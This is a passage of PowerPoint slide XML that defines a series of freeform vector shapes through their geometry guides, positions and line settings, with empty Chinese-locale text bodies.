                <a:gd name="T26" fmla="*/ 2 w 538"/>
                <a:gd name="T27" fmla="*/ 1 h 489"/>
                <a:gd name="T28" fmla="*/ 2 w 538"/>
                <a:gd name="T29" fmla="*/ 1 h 489"/>
                <a:gd name="T30" fmla="*/ 2 w 538"/>
                <a:gd name="T31" fmla="*/ 1 h 489"/>
                <a:gd name="T32" fmla="*/ 1 w 538"/>
                <a:gd name="T33" fmla="*/ 0 h 489"/>
                <a:gd name="T34" fmla="*/ 1 w 538"/>
                <a:gd name="T35" fmla="*/ 0 h 489"/>
                <a:gd name="T36" fmla="*/ 1 w 538"/>
                <a:gd name="T37" fmla="*/ 0 h 489"/>
                <a:gd name="T38" fmla="*/ 1 w 538"/>
                <a:gd name="T39" fmla="*/ 0 h 489"/>
                <a:gd name="T40" fmla="*/ 1 w 538"/>
                <a:gd name="T41" fmla="*/ 1 h 489"/>
                <a:gd name="T42" fmla="*/ 1 w 538"/>
                <a:gd name="T43" fmla="*/ 1 h 489"/>
                <a:gd name="T44" fmla="*/ 1 w 538"/>
                <a:gd name="T45" fmla="*/ 1 h 489"/>
                <a:gd name="T46" fmla="*/ 1 w 538"/>
                <a:gd name="T47" fmla="*/ 1 h 489"/>
                <a:gd name="T48" fmla="*/ 2 w 538"/>
                <a:gd name="T49" fmla="*/ 2 h 489"/>
                <a:gd name="T50" fmla="*/ 2 w 538"/>
                <a:gd name="T51" fmla="*/ 2 h 489"/>
                <a:gd name="T52" fmla="*/ 2 w 538"/>
                <a:gd name="T53" fmla="*/ 2 h 489"/>
                <a:gd name="T54" fmla="*/ 2 w 538"/>
                <a:gd name="T55" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1107" name="Freeform 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="821" y="3101"/>
              <a:ext cx="197" cy="153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 590"/>
                <a:gd name="T1" fmla="*/ 1 h 460"/>
                <a:gd name="T2" fmla="*/ 2 w 590"/>
                <a:gd name="T3" fmla="*/ 1 h 460"/>
                <a:gd name="T4" fmla="*/ 2 w 590"/>
                <a:gd name="T5" fmla="*/ 1 h 460"/>
                <a:gd name="T6" fmla="*/ 1 w 590"/>
                <a:gd name="T7" fmla="*/ 0 h 460"/>
                <a:gd name="T8" fmla="*/ 1 w 590"/>
                <a:gd name="T9" fmla="*/ 0 h 460"/>
                <a:gd name="T10" fmla="*/ 1 w 590"/>
                <a:gd name="T11" fmla="*/ 0 h 460"/>
                <a:gd name="T12" fmla="*/ 1 w 590"/>
                <a:gd name="T13" fmla="*/ 0 h 460"/>
                <a:gd name="T14" fmla="*/ 0 w 590"/>
                <a:gd name="T15" fmla="*/ 1 h 460"/>
                <a:gd name="T16" fmla="*/ 0 w 590"/>
                <a:gd name="T17" fmla="*/ 1 h 460"/>
                <a:gd name="T18" fmla="*/ 0 w 590"/>
                <a:gd name="T19" fmla="*/ 1 h 460"/>
                <a:gd name="T20" fmla="*/ 1 w 590"/>
                <a:gd name="T21" fmla="*/ 1 h 460"/>
                <a:gd name="T22" fmla="*/ 1 w 590"/>
                <a:gd name="T23" fmla="*/ 0 h 460"/>
                <a:gd name="T24" fmla="*/ 1 w 590"/>
                <a:gd name="T25" fmla="*/ 0 h 460"/>
                <a:gd name="T26" fmla="*/ 1 w 590"/>
                <a:gd name="T27" fmla="*/ 0 h 460"/>
                <a:gd name="T28" fmla="*/ 1 w 590"/>
                <a:gd name="T29" fmla="*/ 1 h 460"/>
                <a:gd name="T30" fmla="*/ 2 w 590"/>
                <a:gd name="T31" fmla="*/ 1 h 460"/>
                <a:gd name="T32" fmla="*/ 1 w 590"/>
                <a:gd name="T33" fmla="*/ 1 h 460"/>
                <a:gd name="T34" fmla="*/ 1 w 590"/>
                <a:gd name="T35" fmla="*/ 1 h 460"/>
                <a:gd name="T36" fmla="*/ 0 w 590"/>
                <a:gd name="T37" fmla="*/ 2 h 460"/>
                <a:gd name="T38" fmla="*/ 0 w 590"/>
                <a:gd name="T39" fmla="*/ 2 h 460"/>
                <a:gd name="T40" fmla="*/ 0 w 590"/>
                <a:gd name="T41" fmla="*/ 2 h 460"/>
                <a:gd name="T42" fmla="*/ 1 w 590"/>
                <a:gd name="T43" fmla="*/ 1 h 460"/>
                <a:gd name="T44" fmla="*/ 1 w 590"/>
                <a:gd name="T45" fmla="*/ 1 h 460"/>
                <a:gd name="T46" fmla="*/ 2 w 590"/>
                <a:gd name="T47" fmla="*/ 1 h 460"/>
                <a:gd name="T48" fmla="*/ 2 w 590"/>
                <a:gd name="T49" fmla="*/ 2 h 460"/>
                <a:gd name="T50" fmla="*/ 2 w 590"/>
                <a:gd name="T51" fmla="*/ 2 h 460"/>
                <a:gd name="T52" fmla="*/ 2 w 590"/>
                <a:gd name="T53" fmla="*/ 1 h 460"/>
                <a:gd name="T54" fmla="*/ 2 w 590"/>
                <a:gd name="T55" fmla="*/ 1 h 460"/>
                <a:gd name="T56" fmla="*/ 2 w 590"/>
                <a:gd name="T57" fmla="*/ 1 h 460"/>
                <a:gd name="T58" fmla="*/ 2 w 590"/>
                <a:gd name="T59" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1108" name="Freeform 81"/>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1 w 185"/>
                <a:gd name="T9" fmla="*/ 0 h 172"/>
                <a:gd name="T10" fmla="*/ 1 w 185"/>
                <a:gd name="T11" fmla="*/ 0 h 172"/>
                <a:gd name="T12" fmla="*/ 1 w 185"/>
                <a:gd name="T13" fmla="*/ 0 h 172"/>
                <a:gd name="T14" fmla="*/ 1 w 185"/>
                <a:gd name="T15" fmla="*/ 1 h 172"/>
                <a:gd name="T16" fmla="*/ 0 w 185"/>
                <a:gd name="T17" fmla="*/ 1 h 172"/>
                <a:gd name="T18" fmla="*/ 0 w 185"/>
                <a:gd name="T19" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1109" name="Freeform 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1160" y="3195"/>
              <a:ext cx="66" cy="45"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 200"/>
                <a:gd name="T1" fmla="*/ 0 h 136"/>
                <a:gd name="T2" fmla="*/ 1 w 200"/>
                <a:gd name="T3" fmla="*/ 0 h 136"/>
                <a:gd name="T4" fmla="*/ 1 w 200"/>
                <a:gd name="T5" fmla="*/ 1 h 136"/>
                <a:gd name="T6" fmla="*/ 0 w 200"/>
                <a:gd name="T7" fmla="*/ 1 h 136"/>
                <a:gd name="T8" fmla="*/ 0 w 200"/>
                <a:gd name="T9" fmla="*/ 0 h 136"/>
                <a:gd name="T10" fmla="*/ 1 w 200"/>
                <a:gd name="T11" fmla="*/ 0 h 136"/>
                <a:gd name="T12" fmla="*/ 0 w 200"/>
                <a:gd name="T13" fmla="*/ 0 h 136"/>
                <a:gd name="T14" fmla="*/ 0 w 200"/>
                <a:gd name="T15" fmla="*/ 0 h 136"/>
                <a:gd name="T16" fmla="*/ 0 w 200"/>
                <a:gd name="T17" fmla="*/ 0 h 136"/>
                <a:gd name="T18" fmla="*/ 1 w 200"/>
                <a:gd name="T19" fmla="*/ 0 h 136"/>
                <a:gd name="T20" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1110" name="Freeform 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="454" y="3237"/>
              <a:ext cx="443" cy="238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 1330"/>
                <a:gd name="T1" fmla="*/ 0 h 714"/>
                <a:gd name="T2" fmla="*/ 0 w 1330"/>
                <a:gd name="T3" fmla="*/ 0 h 714"/>
                <a:gd name="T4" fmla="*/ 0 w 1330"/>
                <a:gd name="T5" fmla="*/ 1 h 714"/>
                <a:gd name="T6" fmla="*/ 0 w 1330"/>
                <a:gd name="T7" fmla="*/ 1 h 714"/>
                <a:gd name="T8" fmla="*/ 1 w 1330"/>
                <a:gd name="T9" fmla="*/ 1 h 714"/>
                <a:gd name="T10" fmla="*/ 1 w 1330"/>
                <a:gd name="T11" fmla="*/ 1 h 714"/>
                <a:gd name="T12" fmla="*/ 4 w 1330"/>
                <a:gd name="T13" fmla="*/ 2 h 714"/>
                <a:gd name="T14" fmla="*/ 5 w 1330"/>
                <a:gd name="T15" fmla="*/ 3 h 714"/>
                <a:gd name="T16" fmla="*/ 5 w 1330"/>
                <a:gd name="T17" fmla="*/ 3 h 714"/>
                <a:gd name="T18" fmla="*/ 2 w 1330"/>
                <a:gd name="T19" fmla="*/ 1 h 714"/>
                <a:gd name="T20" fmla="*/ 2 w 1330"/>
                <a:gd name="T21" fmla="*/ 1 h 714"/>
                <a:gd name="T22" fmla="*/ 2 w 1330"/>
                <a:gd name="T23" fmla="*/ 1 h 714"/>
                <a:gd name="T24" fmla="*/ 1 w 1330"/>
                <a:gd name="T25" fmla="*/ 0 h 714"/>
                <a:gd name="T26" fmla="*/ 1 w 1330"/>
                <a:gd name="T27" fmla="*/ 0 h 714"/>
                <a:gd name="T28" fmla="*/ 1 w 1330"/>
                <a:gd name="T29" fmla="*/ 0 h 714"/>
                <a:gd name="T30" fmla="*/ 1 w 1330"/>
                <a:gd name="T31" fmla="*/ 1 h 714"/>
                <a:gd name="T32" fmla="*/ 1 w 1330"/>
                <a:gd name="T33" fmla="*/ 1 h 714"/>
                <a:gd name="T34" fmla="*/ 0 w 1330"/>
                <a:gd name="T35" fmla="*/ 0 h 714"/>
                <a:gd name="T36" fmla="*/ 1 w 1330"/>
                <a:gd name="T37" fmla="*/ 0 h 714"/>
                <a:gd name="T38" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1111" name="Freeform 84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="510" y="3225"/>
              <a:ext cx="407" cy="239"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 1220"/>
                <a:gd name="T1" fmla="*/ 3 h 716"/>
                <a:gd name="T2" fmla="*/ 1 w 1220"/>
                <a:gd name="T3" fmla="*/ 1 h 716"/>
                <a:gd name="T4" fmla="*/ 1 w 1220"/>
                <a:gd name="T5" fmla="*/ 0 h 716"/>
                <a:gd name="T6" fmla="*/ 1 w 1220"/>
                <a:gd name="T7" fmla="*/ 0 h 716"/>
                <a:gd name="T8" fmla="*/ 1 w 1220"/>
                <a:gd name="T9" fmla="*/ 0 h 716"/>
                <a:gd name="T10" fmla="*/ 0 w 1220"/>
                <a:gd name="T11" fmla="*/ 0 h 716"/>
                <a:gd name="T12" fmla="*/ 0 w 1220"/>
                <a:gd name="T13" fmla="*/ 0 h 716"/>
                <a:gd name="T14" fmla="*/ 1 w 1220"/>
                <a:gd name="T15" fmla="*/ 0 h 716"/>
                <a:gd name="T16" fmla="*/ 1 w 1220"/>
                <a:gd name="T17" fmla="*/ 0 h 716"/>
                <a:gd name="T18" fmla="*/ 1 w 1220"/>
                <a:gd name="T19" fmla="*/ 1 h 716"/>
                <a:gd name="T20" fmla="*/ 1 w 1220"/>
                <a:gd name="T21" fmla="*/ 1 h 716"/>
                <a:gd name="T22" fmla="*/ 1 w 1220"/>
                <a:gd name="T23" fmla="*/ 1 h 716"/>
                <a:gd name="T24" fmla="*/ 5 w 1220"/>
                <a:gd name="T25" fmla="*/ 3 h 716"/>
                <a:gd name="T26" fmla="*/ 5 w 1220"/>
                <a:gd name="T27" fmla="*/ 3 h 716"/>
                <a:gd name="T28" fmla="*/ 5 w 1220"/>
                <a:gd name="T29" fmla="*/ 3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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1112" name="Freeform 85"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="432" y="3235"/>
              <a:ext cx="457" cy="247"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 1371"/>
                <a:gd name="T1" fmla="*/ 3 h 741"/>
                <a:gd name="T2" fmla="*/ 5 w 1371"/>
                <a:gd name="T3" fmla="*/ 3 h 741"/>
                <a:gd name="T4" fmla="*/ 5 w 1371"/>
                <a:gd name="T5" fmla="*/ 3 h 741"/>
                <a:gd name="T6" fmla="*/ 5 w 1371"/>
                <a:gd name="T7" fmla="*/ 3 h 741"/>
                <a:gd name="T8" fmla="*/ 5 w 1371"/>
                <a:gd name="T9" fmla="*/ 3 h 741"/>
                <a:gd name="T10" fmla="*/ 4 w 1371"/>
                <a:gd name="T11" fmla="*/ 2 h 741"/>
                <a:gd name="T12" fmla="*/ 4 w 1371"/>
                <a:gd name="T13" fmla="*/ 2 h 741"/>
                <a:gd name="T14" fmla="*/ 4 w 1371"/>
                <a:gd name="T15" fmla="*/ 2 h 741"/>
                <a:gd name="T16" fmla="*/ 4 w 1371"/>
                <a:gd name="T17" fmla="*/ 2 h 741"/>
                <a:gd name="T18" fmla="*/ 3 w 1371"/>
                <a:gd name="T19" fmla="*/ 2 h 741"/>
                <a:gd name="T20" fmla="*/ 3 w 1371"/>
                <a:gd name="T21" fmla="*/ 2 h 741"/>
                <a:gd name="T22" fmla="*/ 3 w 1371"/>
                <a:gd name="T23" fmla="*/ 2 h 741"/>
                <a:gd name="T24" fmla="*/ 3 w 1371"/>
                <a:gd name="T25" fmla="*/ 2 h 741"/>
                <a:gd name="T26" fmla="*/ 2 w 1371"/>
                <a:gd name="T27" fmla="*/ 2 h 741"/>
                <a:gd name="T28" fmla="*/ 2 w 1371"/>
                <a:gd name="T29" fmla="*/ 1 h 741"/>
                <a:gd name="T30" fmla="*/ 2 w 1371"/>
                <a:gd name="T31" fmla="*/ 1 h 741"/>
                <a:gd name="T32" fmla="*/ 2 w 1371"/>
                <a:gd name="T33" fmla="*/ 2 h 741"/>
                <a:gd name="T34" fmla="*/ 2 w 1371"/>
                <a:gd name="T35" fmla="*/ 1 h 741"/>
                <a:gd name="T36" fmla="*/ 1 w 1371"/>
                <a:gd name="T37" fmla="*/ 1 h 741"/>
                <a:gd name="T38" fmla="*/ 1 w 1371"/>
                <a:gd name="T39" fmla="*/ 1 h 741"/>
                <a:gd name="T40" fmla="*/ 0 w 1371"/>
                <a:gd name="T41" fmla="*/ 1 h 741"/>
                <a:gd name="T42" fmla="*/ 0 w 1371"/>
                <a:gd name="T43" fmla="*/ 0 h 741"/>
                <a:gd name="T44" fmla="*/ 0 w 1371"/>
                <a:gd name="T45" fmla="*/ 0 h 741"/>
                <a:gd name="T46" fmla="*/ 1 w 1371"/>
                <a:gd name="T47" fmla="*/ 0 h 741"/>
                <a:gd name="T48" fmla="*/ 0 w 1371"/>
                <a:gd name="T49" fmla="*/ 0 h 741"/>
                <a:gd name="T50" fmla="*/ 0 w 1371"/>
                <a:gd name="T51" fmla="*/ 1 h 741"/>
                <a:gd name="T52" fmla="*/ 0 w 1371"/>
                <a:gd name="T53" fmla="*/ 1 h 741"/>
                <a:gd name="T54" fmla="*/ 0 w 1371"/>
                <a:gd name="T55" fmla="*/ 1 h 741"/>
                <a:gd name="T56" fmla="*/ 1 w 1371"/>
                <a:gd name="T57" fmla="*/ 2 h 741"/>
                <a:gd name="T58" fmla="*/ 1 w 1371"/>
                <a:gd name="T59" fmla="*/ 2 h 741"/>
                <a:gd name="T60" fmla="*/ 2 w 1371"/>
                <a:gd name="T61" fmla="*/ 2 h 741"/>
                <a:gd name="T62" fmla="*/ 2 w 1371"/>
                <a:gd name="T63" fmla="*/ 2 h 741"/>
                <a:gd name="T64" fmla="*/ 6 w 1371"/>
                <a:gd name="T65" fmla="*/ 3 h 741"/>
                <a:gd name="T66" fmla="*/ 6 w 1371"/>
                <a:gd name="T67" fmla="*/ 3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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1113" name="Freeform 86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="876" y="3422"/>
              <a:ext cx="366" cy="75"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 5 w 1099"/>
                <a:gd name="T1" fmla="*/ 0 h 225"/>
                <a:gd name="T2" fmla="*/ 4 w 1099"/>
                <a:gd name="T3" fmla="*/ 0 h 225"/>
                <a:gd name="T4" fmla="*/ 4 w 1099"/>
                <a:gd name="T5" fmla="*/ 0 h 225"/>
                <a:gd name="T6" fmla="*/ 4 w 1099"/>
                <a:gd name="T7" fmla="*/ 1 h 225"/>
                <a:gd name="T8" fmla="*/ 4 w 1099"/>
                <a:gd name="T9" fmla="*/ 0 h 225"/>
                <a:gd name="T10" fmla="*/ 3 w 1099"/>
                <a:gd name="T11" fmla="*/ 0 h 225"/>
                <a:gd name="T12" fmla="*/ 2 w 1099"/>
                <a:gd name="T13" fmla="*/ 0 h 225"/>
                <a:gd name="T14" fmla="*/ 1 w 1099"/>
                <a:gd name="T15" fmla="*/ 0 h 225"/>
                <a:gd name="T16" fmla="*/ 0 w 1099"/>
                <a:gd name="T17" fmla="*/ 1 h 225"/>
                <a:gd name="T18" fmla="*/ 0 w 1099"/>
                <a:gd name="T19" fmla="*/ 1 h 225"/>
                <a:gd name="T20" fmla="*/ 1 w 1099"/>
                <a:gd name="T21" fmla="*/ 0 h 225"/>
                <a:gd name="T22" fmla="*/ 2 w 1099"/>
                <a:gd name="T23" fmla="*/ 0 h 225"/>
                <a:gd name="T24" fmla="*/ 3 w 1099"/>
                <a:gd name="T25" fmla="*/ 0 h 225"/>
                <a:gd name="T26" fmla="*/ 4 w 1099"/>
                <a:gd name="T27" fmla="*/ 0 h 225"/>
                <a:gd name="T28" fmla="*/ 4 w 1099"/>
                <a:gd name="T29" fmla="*/ 0 h 225"/>
                <a:gd name="T30" fmla="*/ 5 w 1099"/>
                <a:gd name="T31" fmla="*/ 0 h 225"/>
                <a:gd name="T32" fmla="*/ 5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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1114" name="Freeform 87"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="693" y="2847"/>
              <a:ext cx="977" cy="406"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 2930"/>
                <a:gd name="T1" fmla="*/ 2 h 1217"/>
                <a:gd name="T2" fmla="*/ 0 w 2930"/>
                <a:gd name="T3" fmla="*/ 1 h 1217"/>
                <a:gd name="T4" fmla="*/ 0 w 2930"/>
                <a:gd name="T5" fmla="*/ 1 h 1217"/>
                <a:gd name="T6" fmla="*/ 1 w 2930"/>
                <a:gd name="T7" fmla="*/ 0 h 1217"/>
                <a:gd name="T8" fmla="*/ 3 w 2930"/>
                <a:gd name="T9" fmla="*/ 0 h 1217"/>
                <a:gd name="T10" fmla="*/ 5 w 2930"/>
                <a:gd name="T11" fmla="*/ 0 h 1217"/>
                <a:gd name="T12" fmla="*/ 7 w 2930"/>
                <a:gd name="T13" fmla="*/ 0 h 1217"/>
                <a:gd name="T14" fmla="*/ 9 w 2930"/>
                <a:gd name="T15" fmla="*/ 0 h 1217"/>
                <a:gd name="T16" fmla="*/ 10 w 2930"/>
                <a:gd name="T17" fmla="*/ 1 h 1217"/>
                <a:gd name="T18" fmla="*/ 11 w 2930"/>
                <a:gd name="T19" fmla="*/ 2 h 1217"/>
                <a:gd name="T20" fmla="*/ 11 w 2930"/>
                <a:gd name="T21" fmla="*/ 3 h 1217"/>
                <a:gd name="T22" fmla="*/ 12 w 2930"/>
                <a:gd name="T23" fmla="*/ 3 h 1217"/>
                <a:gd name="T24" fmla="*/ 12 w 2930"/>
                <a:gd name="T25" fmla="*/ 4 h 1217"/>
                <a:gd name="T26" fmla="*/ 12 w 2930"/>
                <a:gd name="T27" fmla="*/ 4 h 1217"/>
                <a:gd name="T28" fmla="*/ 11 w 2930"/>
                <a:gd name="T29" fmla="*/ 5 h 1217"/>
                <a:gd name="T30" fmla="*/ 11 w 2930"/>
                <a:gd name="T31" fmla="*/ 5 h 1217"/>
                <a:gd name="T32" fmla="*/ 11 w 2930"/>
                <a:gd name="T33" fmla="*/ 4 h 1217"/>
                <a:gd name="T34" fmla="*/ 10 w 2930"/>
                <a:gd name="T35" fmla="*/ 4 h 1217"/>
                <a:gd name="T36" fmla="*/ 10 w 2930"/>
                <a:gd name="T37" fmla="*/ 4 h 1217"/>
                <a:gd name="T38" fmla="*/ 10 w 2930"/>
                <a:gd name="T39" fmla="*/ 4 h 1217"/>
                <a:gd name="T40" fmla="*/ 10 w 2930"/>
                <a:gd name="T41" fmla="*/ 4 h 1217"/>
                <a:gd name="T42" fmla="*/ 11 w 2930"/>
                <a:gd name="T43" fmla="*/ 4 h 1217"/>
                <a:gd name="T44" fmla="*/ 11 w 2930"/>
                <a:gd name="T45" fmla="*/ 4 h 1217"/>
                <a:gd name="T46" fmla="*/ 11 w 2930"/>
                <a:gd name="T47" fmla="*/ 5 h 1217"/>
                <a:gd name="T48" fmla="*/ 11 w 2930"/>
                <a:gd name="T49" fmla="*/ 4 h 1217"/>
                <a:gd name="T50" fmla="*/ 12 w 2930"/>
                <a:gd name="T51" fmla="*/ 4 h 1217"/>
                <a:gd name="T52" fmla="*/ 11 w 2930"/>
                <a:gd name="T53" fmla="*/ 3 h 1217"/>
                <a:gd name="T54" fmla="*/ 11 w 2930"/>
                <a:gd name="T55" fmla="*/ 3 h 1217"/>
                <a:gd name="T56" fmla="*/ 11 w 2930"/>
                <a:gd name="T57" fmla="*/ 3 h 1217"/>
                <a:gd name="T58" fmla="*/ 10 w 2930"/>
                <a:gd name="T59" fmla="*/ 2 h 1217"/>
                <a:gd name="T60" fmla="*/ 9 w 2930"/>
                <a:gd name="T61" fmla="*/ 1 h 1217"/>
                <a:gd name="T62" fmla="*/ 8 w 2930"/>
                <a:gd name="T63" fmla="*/ 0 h 1217"/>
                <a:gd name="T64" fmla="*/ 6 w 2930"/>
                <a:gd name="T65" fmla="*/ 1 h 1217"/>
                <a:gd name="T66" fmla="*/ 4 w 2930"/>
                <a:gd name="T67" fmla="*/ 1 h 1217"/>
                <a:gd name="T68" fmla="*/ 2 w 2930"/>
                <a:gd name="T69" fmla="*/ 0 h 1217"/>
                <a:gd name="T70" fmla="*/ 1 w 2930"/>
                <a:gd name="T71" fmla="*/ 0 h 1217"/>
                <a:gd name="T72" fmla="*/ 0 w 2930"/>
                <a:gd name="T73" fmla="*/ 1 h 1217"/>
                <a:gd name="T74" fmla="*/ 0 w 2930"/>
                <a:gd name="T75" fmla="*/ 1 h 1217"/>
                <a:gd name="T76" fmla="*/ 1 w 2930"/>
                <a:gd name="T77" fmla="*/ 1 h 1217"/>
                <a:gd name="T78" fmla="*/ 0 w 2930"/>
                <a:gd name="T79" fmla="*/ 2 h 1217"/>
                <a:gd name="T80" fmla="*/ 0 w 2930"/>
                <a:gd name="T81" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1115" name="Freeform 88"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="607" y="2835"/>
              <a:ext cx="162" cy="115"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 486"/>
                <a:gd name="T1" fmla="*/ 1 h 344"/>
                <a:gd name="T2" fmla="*/ 1 w 486"/>
                <a:gd name="T3" fmla="*/ 1 h 344"/>
                <a:gd name="T4" fmla="*/ 0 w 486"/>
                <a:gd name="T5" fmla="*/ 1 h 344"/>
                <a:gd name="T6" fmla="*/ 0 w 486"/>
                <a:gd name="T7" fmla="*/ 1 h 344"/>
                <a:gd name="T8" fmla="*/ 0 w 486"/>
                <a:gd name="T9" fmla="*/ 0 h 344"/>
                <a:gd name="T10" fmla="*/ 1 w 486"/>
                <a:gd name="T11" fmla="*/ 0 h 344"/>
                <a:gd name="T12" fmla="*/ 2 w 486"/>
                <a:gd name="T13" fmla="*/ 0 h 344"/>
                <a:gd name="T14" fmla="*/ 2 w 486"/>
                <a:gd name="T15" fmla="*/ 0 h 344"/>
                <a:gd name="T16" fmla="*/ 2 w 486"/>
                <a:gd name="T17" fmla="*/ 0 h 344"/>
                <a:gd name="T18" fmla="*/ 2 w 486"/>
                <a:gd name="T19" fmla="*/ 1 h 344"/>
                <a:gd name="T20" fmla="*/ 2 w 486"/>
                <a:gd name="T21" fmla="*/ 0 h 344"/>
                <a:gd name="T22" fmla="*/ 1 w 486"/>
                <a:gd name="T23" fmla="*/ 0 h 344"/>
                <a:gd name="T24" fmla="*/ 0 w 486"/>
                <a:gd name="T25" fmla="*/ 1 h 344"/>
                <a:gd name="T26" fmla="*/ 0 w 486"/>
                <a:gd name="T27" fmla="*/ 1 h 344"/>
                <a:gd name="T28" fmla="*/ 1 w 486"/>
                <a:gd name="T29" fmla="*/ 1 h 344"/>
                <a:gd name="T30" fmla="*/ 1 w 486"/>
                <a:gd name="T31" fmla="*/ 1 h 344"/>
                <a:gd name="T32" fmla="*/ 1 w 486"/>
                <a:gd name="T33" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1116" name="Freeform 89"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="642" y="2878"/>
              <a:ext cx="58" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 173"/>
                <a:gd name="T1" fmla="*/ 0 h 125"/>
                <a:gd name="T2" fmla="*/ 0 w 173"/>
                <a:gd name="T3" fmla="*/ 0 h 125"/>
                <a:gd name="T4" fmla="*/ 1 w 173"/>
                <a:gd name="T5" fmla="*/ 0 h 125"/>
                <a:gd name="T6" fmla="*/ 1 w 173"/>
                <a:gd name="T7" fmla="*/ 0 h 125"/>
                <a:gd name="T8" fmla="*/ 0 w 173"/>
                <a:gd name="T9" fmla="*/ 1 h 125"/>
                <a:gd name="T10" fmla="*/ 0 w 173"/>
                <a:gd name="T11" fmla="*/ 0 h 125"/>
                <a:gd name="T12" fmla="*/ 0 w 173"/>
                <a:gd name="T13" fmla="*/ 0 h 125"/>
